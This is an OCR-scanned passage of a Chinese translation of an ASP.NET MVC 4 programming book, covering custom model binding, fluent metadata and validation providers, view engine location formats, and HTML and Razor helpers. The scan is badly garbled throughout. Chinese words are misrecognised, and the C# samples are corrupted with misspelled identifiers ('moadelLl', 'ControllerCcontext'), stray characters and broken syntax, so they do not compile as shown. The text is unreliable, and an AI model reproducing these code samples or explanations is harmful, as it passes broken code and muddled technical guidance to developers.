attemptedValue = null; 


我 们 使 用 模型 元 数据 来 决定 是 否 将 空 字符 串 转 换 为 null。 由 于 当 用 户 没 有 输入 任何 值 
时 ，HTML 表单 总 是 提交 空 字符 串 而 不 是 null， 因 此 这 一 转换 功能 默认 是 开启 的 。 通 常 
以 编写 检查 要 求 值 的 验证 器 ， 使 得 null 通 不 过 验证 ， 而 让 空 字符 串通 过 验证 。 因 此 ， 开 发 
人 员 可 以 在 元 数据 中 设置 一 个 标志 来 允许 空 字符 串 放 在 字段 中 而 不 转换 成 null， 故 所 有 必 
要 验证 检查 都 失败 。 

(G3) 下 一 段 代 码 尝 试 把 值 转换 为 日 标 类 型 ， 并 记录 是 否 存 在 转换 错误 。 无 论 采 用 哪 种 
方式 ， 元 数据 中 都 需要 有 值 ， 以 便 验 证 器 有 值 进 行 验 证 。 如 果 能 够 成 功 转换 该 值 ， 就 可 以 
使 用 该 值 ， 否 则 需要 使 用 尝试 值 ， 尽 管 知道 它 不 是 正确 类 型 。 


TModel model; 
bool invalidValue = false; 


try 

{ 
model = (TModel)valueProviderResult.ConvertTo (typeof (TModel)); 
metadata.Model = model; 

} 

catch (Exception) 


{ 
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moadelLl = default (TModel); 
metadata.Model = attemptedValue; 
invalidValue = true; 


} 


这 里 记录 是 否 有 转换 失败 是 为 了 以 后 使 用 ， 因 为 我 们 想 在 没有 其 他 的 验证 失败 的 情况 
下 ， 添 加 转换 失败 的 错误 提示 消息 。 例 如 ，required 的 值 通 常会 出 现 没 有 填写 的 错误 或 数 
据 转 换 失 败 ， 但 required 的 验证 消 晨 是 正确 的 ， 所 以 我 们 想 让 它 有 较 高 的 优先 级 。 
(4) 运行 所 有 验证 器 ， 并 在 模型 状态 的 错误 集合 中 记录 每 一 个 验证 错误 : 
IEnumerable<ModelValidator> validators = 
ModelValidatorProviders.Providers.GetValidators'! 
metadata, 


control lerCcontext 


1 


foreach (Var validator in validators) 
foreach (var validatorResult in 
validator.Validate (bindingContext .Model)) 
modelstate.Errors.Add (validatorResult.Message); 


(5) 记录 数据 类 型 转换 错误 ， 如 果 发 生 失 败 并 且 没 有 其 他 验证 规则 失败 ， 就 返回 该 值 ， 
以 便 模型 绑 定 过 程 的 其 他 部 分 使 用 : 
1 (invalidValue && modelstate.Errors.Count == 0) 
modelstate .Errors.Addl 
String.Format( 
"The value {0}" jis not a valid value for {1]}.", 
attemptedValue, 
metadata .GetDisplayName () 


); 
return model: 


示例 中 包括 一 个 能 够 展示 模型 绑 定 右 应 用 情况 的 简单 控制 右 和 视 岁 ( 它 注册 在 区 域 注 
册 文 件 中 )。 本 例 葵 用 了 客户 闯 验 证 ， 以 便 更 容易 地 观测 服务 器 端 逻辑 的 运行 ， 并 对 其 进行 
调试 。 我 们 也 可 以 开局 视图 中 的 客户 痛 验 证 ， 以 确保 客户 站 验证 规则 正常 运行 。 


14.1.2 ”用 元 数据 摘 述 模型 


ASPNET MVC 2 中 引入 了 模型 元 数据 系统 ， 用 来 帮助 描述 用 于 协助 HTML 生成 和 模 
型 验证 的 模型 元 数据 信息 。 模 型 元 数据 系统 提供 的 信息 包括 (但 不 局 限于 ) 以 下 问题 的 答案 : 

e 模型 的 种 类 是 什么 ? 

e 如 果 包 含 的 话 ， 包 含 的 模型 种 类 是 什么 ? 

e 包含 该 值 的 属性 名 称 是 什么 ? 

e 它 是 简单 类 型 还 是 复杂 类 型 ? 
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e 显示 的 名 称 是 什么 ? 

e 如 何 格式 化 显示 的 值 ? 编辑 的 值 ? 

e 该 值 是 必需 的 吗 ? 

e 该 值 是 只 读 的 吗 ? 

e 应 该 采用 什么 模板 来 显示 它 ? 

ASPNET MVC 文 持 通过 应 用 于 类 和 属性 的 特性 所 表示 的 模型 元 数据 。 这 些 特性 主要 
包含 在 名 称 空间 System.ComponentModel 和 System.ComponentModel.DataAnnotations 中 。 

在 .NET 1.0 中 就 已 经 引入 了 ComponentModel 名 称 空间 ， 它 最 初 只 是 设计 用 于 Visual 
Studio 设计 器 ， 如 Web Forms 和 Windows Forms。DataAnnotations 类 在 .NET 3.5 SP1 中 和 
ASPNET Dynamic Data 一 起 被 引入 ， 并 且 主 要 和 模型 元 数据 一 起 使 用 。DataAnnotations 类 
在 NET4 有 了 显著 增强 ， 开 始 被 WCF RIA 服务 团队 使 用 ， 同 时 也 开始 移植 到 Silverlight 4 
中 。 尽 管 由 ASPNET 团队 发 起 ， 但 它们 已 经 从 开始 的 设计 变 成 了 UI 表现 层 的 不 可 知 论 者 
(agnostic), 这 正 是 它们 在 名 称 空间 System.ComponentModel 中 而 不 在 名 称 空间 System.Web 
中 的 原因 。 

ASPNET MVC 提供 了 一 个 可 搬 拔 的 模型 元 数据 提供 需 系 统 , 如 果 不 想 使 用 DataAnnotations 
特性 的 话 ， 我 们 可 以 提供 自己 的 元 数据 源 。 实 现 一 个 元 数据 提供 器 意味 着 需要 继承 类 
ModelMetadataProvider， 并 实现 其 中 的 三 个 抽象 方法 ; 

e GetMetadataForType 返回 关于 整个 类 的 元 数据 。 

e GetMetadataForProperty 返回 类 上 单个 属性 的 元 数据 。 

e GetMetadataForProperties 返回 类 上 所 有 属性 的 元 数据 。 

还 有 一 个 名 为 AssociatedMetadataProvider 的 派生 类 ， 可 以 被 计划 通过 特性 提供 元 数据 
的 元 数据 提供 器 使 用 。 它 把 上 述 三 个 方法 的 调用 压缩 到 对 CreateMetadata 方法 的 调用 ， 并 
和 附加 到 模型 的 与 /或 模型 属性 的 特性 列表 一 起 传递 .由 于 简化 的 API 和 对 元 数据 多 开关 
的 目 动 支持 ， 因 此 如 果 要 编写 用 特性 装饰 模型 的 元 数据 提供 器 ， 那 么 使 用 
AssociatedMetadataProvider 作为 提供 器 的 基 类 就 是 一 个 不 错 的 选择 。 

元 数据 示例 代码 在 目录 ~/Areas/FluentMetadata 下 包含 了 一 个 变数 (fluenb 元 数据 提供 器 
的 示例 。 这 个 提供 堪 的 实现 十 分 复杂 ， 但 与 提供 给 最 终 用 户 的 元 数据 数量 相 比 ， 这 些 代 人 码 
还 是 简单 明了 的 。 由 于 ASPNET MVC 只 能 使 用 一 个 元 数据 提供 堪 ， 因 此 该 例 继 承 目 内 置 
的 元 数据 提供 器 ， 以 便 用 户 可 以 混用 传统 的 元 数据 特性 和 动态 的 基于 代码 的 元 数据 。 

在 内 置 元 数据 特性 之 上 的 样 例 变 数 元 数据 提供 器 具有 独特 的 优势 ， 它 可 以 用 来 描述 和 
装饰 不 受 我 们 控制 的 类 。 对 于 传统 的 特性 方法 ， 当 编写 类 型 时 ， 特 性 必须 应 用 到 类 型 ， 对 
于 像 变 数 元 数据 提供 器 的 方法 ， 类 型 描述 独立 于 类 型 定义 ， 这 样 我 们 就 可 以 把 规则 应 用 到 
不 是 目 己 定义 的 类 型 上 (例如 ，.NET 框架 中 的 内 置 关 型 )。 

在 下 面 的 示例 中 ， 元 数据 在 区 域 注 册 函 数 内 注册 : 

ModelMetadataProviders.Current = 


new FluentMetadataProvider() 
.ForModel<Contact>() 
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.ForProperty(m => m.FirstName) 
.DisplayName ("First Name™") 
.DataTypeName ("string") 

.ForProperty(m => m.LastName) 
.DisplayName ("Last Name") 
.DataTypeName ("string") 

.ForProperty(m => m.EmailAddress) 
-DisplayName ("E-mail address") 
.DataTypeName ("email™); 


CreateMetadata 方法 的 实现 首先 获取 继承 日 注解 特性 的 元 数据 ， 然 后 通过 开发 人 员 注 
册 的 修改 方法 (modifier) 修 改 这 些 数 据 。 这 些 修改 方法 ( 像 DisplayName 的 调用 ) 简 单 地 记录 
将 来 在 被 请 求 后 对 ModelMetadata 对 象 所 做 的 修改 。 所 做 的 这 些 修改 存储 在 变数 提供 器 内 
部 的 字典 中 ， 以 便 我 们 以 后 在 CreateMetadata 中 使 用 ， 代 人 码 如 下 : 


protected override Moade Metadata CreateMetadata ( 
IEnumerable<Attribute> attributes, 
Type containerType, 
EUunNnc<object> modelAccessor., 
Type modelType, 
string propertyName) 1{ 


// Start with the metadata from the annotation attributes 
ModelMetadata metadata = 
base.CreateMetadata( 
attributes, 
containerType, 
modelAccessor, 
modelType., 
propertyName 
); 


// Look inside our modifier dictionary for registrations 
Tuple<Type, string> key = 
propertyName == null 
? new Tuple<Type, string> (modelType, null) 
: new Tuple<Type, string> (containerType, propertyName); 


// Apply the modifiers to the metadata, if we found any 
List<Action<ModelMetadata>> modifierList; 
it (modifiers.TryGetValue (key, out modifierList)) 
foreach (Action<ModelMetadata> modifier in modifierList) 
modifier (metadata),; 


return metadata; 


} 


该 元 数据 提供 需 的 实现 仅仅 是 一 个 映射 ， 要 么 是 为 了 修改 类 的 元 数据 ， 从 类 型 到 修改 
图 数 的 映射 ， 要 么 就 是 为 了 修改 属性 的 元 数据 ， 从 类 型 + 属性 名 称 到 修改 函数 的 映射 。 虽 
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然 有 多 个 这 样 的 修改 函数 ， 但 它们 都 遵循 同样 的 基本 模式 ， 这 种 模式 是 指 在 提供 器 的 字典 
中 注册 修改 功能 ， 以 便 以 后 运行 。 下 面 是 DisplayName 修改 函数 的 实现 : 
public MetadataRegistrar<TModel> DisplayName (string displayName) 
{ 
provider.Add | 
typeof (TModel), 
propertyName., 
metadata => metadata.DisplayName = displavyName 


1 


return this; 


} 


其 中 ，Add 方法 调用 的 第 三 个 参数 是 作为 修改 方法 的 匿名 图 数 : 提供 一 个 元 数据 对 象 
的 实例 ， 把 DisplayName 属性 设置 为 开发 人 员 提 供 的 显示 名 称 。 如 果 查 看 该 示例 的 完整 代 
人 码 ， 包 插 探 制 费 和 视图 ， 它 就 会 一 起 展示 所 有 内 容 。 


14.1.3 验证 模型 


模型 验证 在 ASPNET MVC 1.0 中 已 经 引入 ， 但 是 直到 ASPNET MVC 2 时 才 引 入 可 插 拔 
的 验证 提供 器 。ASPNET MVC 1.0 验 证 基于 IdataErrorImfo 接口 ,尽管 该 接口 仍然 可 以 使 用 ， 
但 是 开发 人 员 应 该 考虑 废弃 它 。 使 用 ASPNET MVC 2 及 其 后 续 版 本 的 开发 人 员 可 以 在 模型 
属性 上 使 用 DataAnnotations 验证 特性 。NET 3.5 SP1 包含 4 个 验证 特性 : [Required]、[Range]、 
[StringLength] 和 [Regular Expression]。 开 发 人 员 可 使 用 基 类 ValidationAttribute 来 编写 目 定 
义 的 验证 逻辑 。 

CLR 团队 在 .NET 4 中 对 验证 系统 进行 了 增强 完善 ， 其 中 包括 新 的 TValidatableObject 接 
口 。ASPNET MVC 3 添加 了 两 个 新 验证 器 : [Compare] 和 [有 Remote]。 另 外 ， 如 果 MVC 4 项 
目 建立 在 NET 4.5 框架 之 上 ,那么 我 们 就 有 一 些 MVC 在 Data Annotations 中 文 持 的 新 特性 ， 
这 与 与 使 用 jQuery Validate 的 新 验证 规则 集 相 匹配 , 其 中 包括 [CreditCard]、[EmailAddress]、 
[FileExtensions]、[MaxLength]、[MinLength]、[Phone| 和 [Url]。 

第 6 章 已 深入 地 介绍 了 如 何 编写 目 定义 验证 器 ， 这 里 不 再 重复 。 相 反 ， 这 里 重点 探讨 
编写 验证 侨 提 供 器 更 高 级 的 主题 。 验 证 器 提供 右 允 许 开 发 人 员 引 入 新 的 验证 源 。ASPNET 
MVC 中 默认 安装 了 3 个 验证 器 提供 器 : 

e DataAnnotationsModelValidatorProvider 支持 继承 目 ValidationAttribute 的 验证 器 和 

实现 了 接口 TValidatableObject 的 模型 。 
e DataErrormfoModelValidatorProvider 支持 实现 了 由 ASPNET MVC 1.0 的 验证 层 使 用 
的 IdataErrorInfo 接口 的 类 。 

e ClientDataTypeModelValidatorProvider 提供 了 客户 端 验证 对 内 置 数 字数 据 类 型 的 支 
持 ， 像 整数 、 小 数 、 浮 点 数 和 日 期 等 。 

实现 验证 器 提供 器 意味 着 需要 继承 苛 类 ModelValidatorProvider， 并 实现 返回 给 定 模 型 
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的 验证 器 的 方法 ， 给 定 模型 由 ModelMetadata 的 一 个 实例 和 ControllerContext 表示 。 我 们 
可 通过 使 用 ModelValidatorProviders.Providers 来 注册 目 定 义 的 模型 验证 器 提供 器 。 

在 目录 ~/Areas/FluentValidation 下 的 示例 代码 中 有 一 个 变数 模型 验证 系统 的 例子 。 几乎 
和 变数 模型 元 数据 的 例子 一 样 ， 它 也 是 相当 复杂 的 ， 因 为 它 震 要 提供 一 些 验证 图 数 ， 但 是 
实现 验证 提供 器 的 大 部 分 代码 还 是 相当 简单 明了 的 。 

该 例 在 区 域 注 册 函 数 的 内 部 包括 变数 验证 注册 : 


ModelValidatorProviders.Providers.Addl 
new FluentValidationProvider() 
.ForModel<Contact>() 
.ForPpropertyl(c => c.FirstName) 
.Required () 
-StringqLength (maxLength: 15) 
.ForPropertyl(c => c.LastName) 
. Required (errorMessage: “YOU must provide the last name!") 
.StringLength (minLength: 3, maxLength: 20) 
.ForPropertyl(c => c.EmailAddress) 
-Requlred () 
-StringLength (minLength: 10) 
.EmailAddress!{() 
); 


对 于 该 例 ， 我 们 已 经 实现 了 三 个 不 同 的 验证 器 ， 其 中 既 包 括 服 务 器 端的 验证 支持 ， 也 
包括 客户 端的 验证 文 持 。 注 册 API 看 起 来 和 以 前 检查 的 模型 元 数据 变数 API 几乎 相同 。 
GetValidators 的 实现 基于 一 个 从 请 求 类 型 和 可 选 属性 名 称 映 射 到 验证 器 工厂 的 一 个 字 盟 : 


public override IEnumerable<ModelValidator> GetValidators'! 
ModelMetadata metadata, 
ControllerCcontext context) 1({ 
IEnumerable<ModelValidator> results = Enumerable.Empty<ModelValidator> ();，; 


ift (metadata.PropertyName != null) 
results = GetValidators (metadata, 
context, 
metadata.ContainerType, 
metadata.PropertyName); 


return results.Concatl 
GetValidators (metadata, 
context, 
metadata .ModelType) 
); 
} 


考虑 到 ASPNET MVC 框架 支持 多 个 验证 提供 器 ， 所 以 我 们 没 必 要 继承 或 委托 现 有 的 
验证 提供 器 。 我 们 只 需 添加 自己 合适 的 唯一 的 验证 规则 。 适 用 于 特定 属性 的 验证 器 是 那些 
也 适用 于 属性 自身 和 它 的 类 型 的 验证 器 ， 例 如 ， 假 设 有 如 下 模型 : 
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public class Contact 


{ 
public string FirstName { get; set; 上 
Public string LastName 1{ get; set; } 
public string EmailAddress { get; set; } 
} 


当 为 FirstName 请 求 验证 规则 时 ， 系 统 会 提供 那些 适用 于 FirstName 属性 目 身 或 
System.String( 因 为 这 是 FirstName 的 类 型 ) 的 规则 。 
上 和 面 例子 中 使 用 的 私有 GetValidators 方法 的 实现 经 过 修改 后 ， 代 码 如 下 : 


private IEnumerable<ModelValidator> GetValidators | 
ModelMetadata metadata, 
ControllerContext context, 
Type type, 
string propertyName = null) 


{ 
var key = new Tuple<Type, string> (type, PITOPeTtYName) ; 
List<ValidatorFactory> factories;} 
if (validators.TryGetValue (key, out factories)) 
foreach (var factory in factories) 
yield return factory (metadata, context).; 
} 


修改 后 的 代码 会 查找 已 经 使 用 提供 器 注册 的 所 有 验证 器 工厂 。 我 们 在 注册 中 看 到 的 像 
Required 和 StringLength 等 尔 数 是 用 来 注册 这 些 验 证 器 工厂 的 。 所 有 这 些 函 数 往往 都 遵循 
相同 的 模式 ， 如 下 所 示 : 


public ValidatorReglstrar<TModel> Required{ 
string errorMessage = "{0} is required") 
{ 
provider.Addl 
typeof (TModel)., 
propertyName., 
(metadata, context) => 


new RequliredValidator (metadata, context, errorMessage) 


Fa 


return this; 

} 

provider.Add 调用 的 第 三 个 参数 是 作为 验证 器 工厂 的 匿名 图 数 。 输 入 模型 元 数据 和 摊 
制 顷 上 下 文 ， 它 将 返回 一 个 继承 了 ModelValidator 类 的 实例 。 

MVC 可 理解 基 类 ModelValidator， 并 使 用 它 来 进行 验证 。 我 们 可 以 在 前 面 模型 绑 定 器 
的 示例 中 看 到 ModelValidator 类 的 隐 式 用 法 ， 因 为 当 创 建 和 绑 定 对 象 时 ， 最 终 是 由 模型 绑 
定 硕 负责 执行 验证 。 我 们 正在 使 用 的 RequiredValidator 实现 有 两 个 主要 任务 ;执行 服务 如 
疹 验 证 和 返回 关于 客户 靖 验 证 的 元 数据 ， 实 现代 码 如 下 所 示 : 
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private class RequliredValidator : ModelValidator | 
private string errorMessager; 


Public RequiredValidator (ModelMetadata metadata, 
Controllercontext context. 
string errorMessage) : base (metadata, context) | 
this.errorMessage = errorMessage; 


} 


private string ErrorMessage | 
get 1 
return String.Format (errorMessage, Metadata.GetDisplayName ()); 
} 
} 


public IEnumerable<ModelClientValidationRule> 
GetClientValidationRules() I 
yield return new ModelcCclientValidationRequiredRule (ErrorMessage); 
} 


public IEnumerable<ModelValidatijonResult> Validate (object container) I{ 
ift (Metadata.Model == null) 
yield return new ModelValidationResult 
{ Message = ErrorMessage 1}; 


} 

整个 示例 包括 三 个 验证 规则 (Required、StringLength 和 EmailAddress) 的 实现 ， 涵 盖 了 
模型 、 控 制 费 和 视图 ， 展 示 了 它们 一 起 工作 的 情景 。 客 户 端 验证 被 默认 关闭 ， 以 便 验证 和 
调试 服务 器 端 验证 。 当 然 ， 我 们 可 以 从 视图 中 删除 那 行 代码 来 重新 启用 客户 闹 验 证 ， 以 了 
解 它 的 工作 原理 。 


14.2 ”视图 扩展 


视图 是 操作 返回 结果 的 最 常见 类 型 。 视 图 通常 是 带 有 一 些 代 码 的 模板 ， 可 以 用 来 根据 
输入 (模型 ) 目 定义 输出 。ASPNET MVC 默认 安装 了 两 个 视图 引擎 : 即 在 ASPNET MVC 中 
就 已 经 有 了 的 Web Forms 视图 引擎 和 Razor 视图 引擎 (ASPNET MVC 3 的 新 内 容 )。 此 外 ， 
ASPNET MVC 应 用 程序 还 可 以 使 用 一 些 第 三 方 视图 引擎 ， 其 中 包括 Spark、NHaml 和 
NVelocity 等 。 


14.2.1 自 定义 视图 引擎 


关于 编写 上 自 定 义 视 图 引擎 的 话题 可 以 编写 成 一 整 本 书 ， 不 过 说 实话 很 少 有 人 会 买 ， 因 
为 从 零 编写 视图 引擎 并 不 是 大 多 数 人 需要 完成 的 任务 ;: 再 者 , 现在 还 有 丰富 的 功能 视图 引擎 
源 代 码 可 以 让 这 些 用 户 在 此 基础 上 进行 编号。 因此， 本 节 着 重 介 绍 ASPNET MVC 自 带 的 
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两 个 视图 引擎 的 定制 。 

这 两 个 视图 引擎 类 WebFormViewEngine 和 RazorViewEngine 一 一 都 派生 于 基 类 
BuildManagerViewEngine， 而 基 类 BuildManagerViewEngine 又 派生 目 基 类 VirtualPathProvider- 
ViewEngine。 创 建 管理 器 (build manager) 和 虚拟 路 征 提 供 器 (virtual path provider) 是 ASPNET 
核心 运行 时 内 部 的 功能 。 创 建 管理 占用 来 定位 磁盘 上 的 文件 路 径 ( 像 后 级 名 为 .aspx 和 .cshtml 
的 文件 ) 并 把 定位 到 的 这 些 文 件 转 换 成 源 代码 ， 并 编译 这 些 人 代码。 虚拟 路 径 提 供 器 可 以 帮助 
定位 任何 类 型 的 文件 ， 默认 情况 下 ， 系 统 查 找 磁盘 上 的 文件 ， 但 开发 人 员 也 可 以 用 从 其 他 
地 方 (如 从 数据 库 中 或 从 账 入 的 资源 中 ) 加 载 视图 内 容 的 路 径 提 供 右 替代 虚拟 路 径 提 供 器 。 
如 有 必要 ， 这 两 个 视图 引擎 其 类 允许 开发 人 员 替 换 创 建 管理 器 与 /或 虚拟 路 径 提 供 器 。 

个 比较 常见 的 替代 方案 是 修改 视图 引擎 在 磁盘 上 查找 文件 的 位 置 。 按 照 约定 ， 视 图 
引擎 通常 在 以 下 位 置 查找 文件 : 

~/Areas/AreaName/Views/ControllerName 

~/Areas/AreaName/Views/Shared 


~/Views/ControllerName 
~/Views/Shared 


这 些 位 置 在 视图 引擎 的 构造 函数 运行 期 间 就 设置 到 了 它 的 属性 集合 中 ， 因 此 ， 开 发 人 
员 可 以 创建 一 个 继承 目 他 们 选择 的 视图 引擎 的 新 视图 引擎 ,并 在 创建 过 程 中 重 写 这 些 位 置 。 
以 下 代码 展示 了 WebFormViewEnegine 的 某 个 构造 函数 的 相关 代码 : 


AreaMasterLocationFormats = new string[l|] 1 
"~/Areas/{2}/Views/{1}/{0} .master™., 
"~/Areas/{2}/Views/Shared/{0}.master" 

}; 

AreaVliewLocatijonFormats = new string[|] | 
"~/Areas/{2}/Views/{1}/{0} .aspx", 
"~/Areas/{2}/Views/{1}/{0} .ascx™, 
"~/Areas/{2}/Views/Shared/{0} .aspx", 
"~/Areas/{2}/Views/Shared/{0}.ascx" 

}; 


AreaPartialViewLocationFormats = AreaViewLocationFormats; 


MasterLocationFormats = new string[l|] 1 
"~/Views/{1}/{0} .master"™"., 
"~/Views/Shared/{0} .master"™" 

}; 

ViewLocationFormats = new string[|] | 
"~/Views/{1}/{0}.aspx", 
"~/Views/{l1}/{0}.ascx", 
"~/Views/Shared/{0} .aspx", 
"~/Views/Shared/{0} .ascx"™ 

}; 


partialViewLocationFormats = ViewLocationFormats:; 


这 些 字 符 串 通过 String.Format 发 送 ， 并 且 传 递 过 来 的 参数 是 : 
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{0} = 视图 名 称 
{1} = 控制 器 名 称 
{2} = 区 域名 称 


通过 这 些 字符 串 ， 开 发 人 员 可 以 修改 视图 位 置 的 约定 。 例 如 ， 只 想 把 .aspx 文件 作为 完 
整 视图 对 待 ， 而 把 .ascx 文件 作为 部 分 视图 对 待 。 这 就 需要 两 个 视图 拥有 相同 的 名 称 ， 却 具 
有 不 同 的 扩展 名 ， 根 据 请 求 的 视图 类 型 (完整 或 部 分 ) 来 决定 具体 泻 染 哪个 视图 。 

Razor 视图 引擎 的 构造 函数 的 内 部 代码 类 似 于 如 下 代码 


AreaMasterLocationFormats = new string[|] 1{ 
"~/Areas/{2}/Views/{1}/{0}.cshtm]l™, 
"~/Areas/{2}/Views/{1}/{0}.vbhtml", 
"~/Areas/{2}/Views/SsShared/{0}.cshtml", 
"~/Areas/{2}/Views/Shared/{0} .vbhhtml" 

}; 

AreaViewLocationFormats = AreaMasterLocationFormats; 

AreaPartialViewLocationFormats = AreaMasterLocationFormats; 


MasterLocationFormats = new string[l|] 1 
"~/Views/{l1}/{0}.cshtml", 
"~/Views/{1}/{0} .vbhtml", 
"~/Views/Shared/{0}.cshtml™, 
"~/Views/Shared/{0} .vbhhtml™" 
}; 
ViewLocationFormats = MasterLocationFormats,; 
PartialViewLocationFormats = MasterLocationFormats,; 


上 面 代 码 与 前 面 的 代码 的 细微 区 别 在 于 ，Razor 使 用 了 区 别 于 编程 语言 (C# 和 VB) 的 文 
件 扩 展 名 ， 它 没有 针对 母 版 视图 、 视 图 和 部 分 视图 的 独立 文件 类 型 ， 也 没有 针对 页 面 与 控 
制 的 独立 文件 类 型 ， 之 所 以 这 样 ， 是 因为 Razor 中 不 存在 这 样 的 结构 。 

- 旦 自 定 义 了 视图 引擎 ， 就 需要 让 MVC 使 用 它 。 另 外 ， 还 需要 删除 要 替换 的 现 有 视 
图 引擎 。 我 们 需要 在 Globalasax 文件 中 配置 MVC( 或 者 通过 使 用 MVC 4 默认 模板 的 
App_Start 文件 夹 下 的 一 个 Config 类 )。 

例如 ， 如 果 要 使 用 自 定 义 的 视图 引擎 替换 Razor 视图 引擎 , 我们 需要 如 下 所 示 的 代码 : 


Var razorEngine = ViewEngines.Engines 
.SingleOrDefault (ve => Ve is RazorViewEngine); 


if (razorEngine != null) 
ViewEngines.Engines.Remove (razorEngine).; 


ViewEngines.Engines.Add (new MyRazorViewEngine ())}); 


上 而 代码 使 用 了 LINQ 语法 来 判定 Razor 视图 引擎 是 否 已 经 安装 (删除 Razor 需要 这 些 
信息 )， 然 后 添加 目 定 义 的 新 Razor 视图 引擎 的 实例 。 请 记 住 ， 视 图 引擎 是 按 顺 序 执行 的 ， 
因此 ， 想 要 让 新 的 Razor 视图 引擎 先 于 注册 的 其 他 视图 引擎 运行 ， 我 们 就 不 需要 使 用 .Add 


347 


ASPNET MVC 4 高 级 编程 (第 4 版 ) 


方法 ， 而 使 用 Insert 方法 ， 并 且 确 保 插 入 的 索引 位 置 是 0， 以 确保 它 在 第 一 位 。 
14.2.2 ”编写 HTML 辅助 方法 


HTML 辅助 方法 主要 用 来 在 视图 中 生成 HIML 标记 。 它 们 通常 作为 HtmlHelper、 
AjaxHelper 或 UrlHelper 类 的 扩展 方法 来 编写 , 具体 作为 哪 一 个 类 的 扩展 方法 则 根据 要 生成 的 
内 容 来 确定 : 是 纯 HTML， 是 支持 Ajax 的 HTML 还 是 URL。HTML 和 Ajax 辅助 方法 可 以 
访问 ViewContext， 因 为 它们 只 能 从 视图 中 调用 , 而 URL 辅助 方法 可 以 访问 ControllerContext， 
因为 它们 既 可 以 从 控制 器 中 调用 ， 也 可 以 从 视图 中 调用 。 

扩展 方法 是 静态 类 中 的 静态 方法 ， 它 们 通过 其 第 一 个 参数 上 的 this 关键 字 来 告知 编译 
器 它们 提供 的 扩展 类 型 。 例 如 ， 如 果 想 为 HtmlHelper 类 提供 一 个 没有 参数 的 扩展 方法 ,我 
们 可 能 编写 如 下 的 代码 : 

public static class MyExtensions I 

public static string MyExtensionMethodl(this HtmlHelper html) 1{ 
return "Hello, world!l™; 


} 
} 


我 们 仍 可 以 使 用 传统 方式 ( 即 通 过 调用 MyExtensions.MyExtensionMethod(Html)) 来 调 
用 该 方法 , 但 是 使 用 扩展 语法 ( 即 通 过 调用 Html.MyExtensionMethodO) 可 以 更 加 方便 地 调用 
它 。 提 供给 该 静态 方法 的 任何 其 他 参数 也 会 变 成 扩展 方法 中 的 参数 ， 而 只 有 使 用 this 关键 
字 标 记 的 扩展 参数 “消失 ”了 。 

ASPNET MVC 中 的 扩展 方法 都 倾向 于 返回 String 类 型 的 值 ， 并 使 用 类 似 于 下 面 语句 
(Web Forms 视图 语法 ) 的 调用 格式 直接 把 返回 的 值 放 入 输出 流 中 : 


<= Html .MyExtensionMethod() $$> 


但 使 用 Web Forms 旧版 本 语法 存在 一 个 问题 : 它 很 容易 产生 让 人 意 想 不 到 的 HIML 
转 义 ， 从 而 产生 错误 。 在 20 世纪 90 年 代 末 到 21 世纪 初 ，ASPNET 刚刚 开始 它 的 “生命 
旅程 "， 那 时 的 Web 世界 与 今天 相 比 有 很 大 的 差别 ， 那 时 的 Web 应 用 程序 必须 小 心 像 跨 站 
脚本 攻击 和 跨 站 请 求 伪 造 攻击 等 常见 的 网 络 攻 击 。 为 了 增加 网 络 世 界 的 安全 系数 , ASPNET 
4 为 Web Forms 引入 丁目 动 编 妈 HTML 值 的 新 语法 ， 如 下 所 示 : 


< 省 : Html .MyExtensionMethod() 要 > 


注意 ， 这 里 用 冒号 取代 了 等 号 。 这 一 改变 对 于 数据 安全 来 说 意义 重大 ， 但 是 正如 许多 
HTML 辅助 方法 所 做 的 , 当 我 们 真正 需要 返回 HTML 时 会 发 生 什 么 ? ASPNET4 也 引入 了 
-个 任何 类 型 都 可 以 实现 的 新 接口 (IHtmlString)。 当 通过 <%: %> 语 法 传递 字符 串 时 ， 系 统 
能 够 识别 出 输入 是 已 经 保证 安全 的 HTML， 并 直接 输出 而 不 进行 编码 处 理 。 在 ASPNET MVC 
2 中 ， 开 发 团队 决定 稍微 打破 回 后 的 兼容 性 ， 使 万 有 HIML 辅助 方法 都 返回 MvcHtmlstring 
实例 。 
当 编 写生 成 HTML 的 HTML 辅助 方法 时 ， 我 们 几乎 总 是 想 返 回 IHtmlString 而 不 是 
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String， 之 所 以 这 样 ， 是 因为 我 们 不 想 让 系统 对 返回 的 HTML 进行 编码 。 这 对 于 Razor 视 
图 引擎 是 非常 重要 的 ， 它 只 有 一 条 输出 语句 ， 并 且 总 是 被 编码 ; 

QHtml .MyExtensionMethod () 
14.2.3 ”编写 Razor 辅助 方法 


ASPNET MVC 1.0 中 除了 提供 HTML 辅助 方法 语法 之 外 ， 还 提供 了 Razor 语法 ， 因 此 ， 
开发 人 员 可 以 编写 Razor 辅助 方法 。 这 个 特性 作为 Web Pages 1.0 框 架 的 一 部 分 ,包含 在 ASPNET 
MVC 应 用 程序 中 。 这 些 辅助 方法 既 不 能 访问 MVC 辅助 类 对 象 (如 HtmlHelper、AjaxHelper 
和 UrlHelper), 也 不 能 访问 MVC 上 下 文 对 象 (如 ControllerContext 或 ViewContext)。 但 它们 
可 以 通过 传统 的 静态 ASPNET API(HttpContext.Current) 来 访问 ASPNET 核心 运行 时 的 上 下 

开发 人 员 为 了 实现 视图 的 简单 重用 ， 可 能 会 选择 编写 一 个 Razor 辅助 方法 ， 或 者 他 们 
想 重 用 来 自 一 个 ASPNET MVC 应 用 程序 和 一 个 Web Pages 应 用 程序 的 共同 辅助 代码 ， 再 
或 者 他 们 构建 的 应 用 程序 是 这 两 种 情况 的 结合 .对 于 纯粹 的 ASPNET MVC 开发 人 员 而 言 ， 
传统 的 HIML 辅助 方法 路 由 提供 了 更 大 灵活 性 和 可 定制 性 ， 但 语法 稍微 见长 。 


注意 ”如果 想 了 解 编写 Razor 辅助 方法 的 更 多 详情 , 请 参阅 Jon Galloway 
的 博客 “Comparing MVC 3 Helpers: Using Extension Methods and Declarative 
Razor (VDhelper Syntax”， 网 址 为 http://weblogs.asp.net/jgalloway/7730805.aspx。 
尽管 Jon 的 博客 介绍 的 是 MVC 3 的 内 容 ， 但 是 他 介绍 的 主题 仍然 适用 于 在 
MVC 4 中 编写 Razor 辅助 方法 的 开发 人 员 。 


14.3 ”控制 希 扩 展 


控制 器 操作 是 把 整个 应 用 程序 连接 在 一 块 儿 的 黏合 剂 ; 它们 通过 数据 访问 层 与 模型 对 
话 ， 对 如 何 实现 用 户 要 来 的 活动 做 出 初步 决定 ， 并 决定 如 何 使 用 视图 、JSON、XML 等 做 
出 响应 。 对 如 何 选择 和 执行 操作 进行 自 定 义 是 扩展 ASPNET MVC 的 一 个 重要 方面 。 


14.3.1 操作 选择 


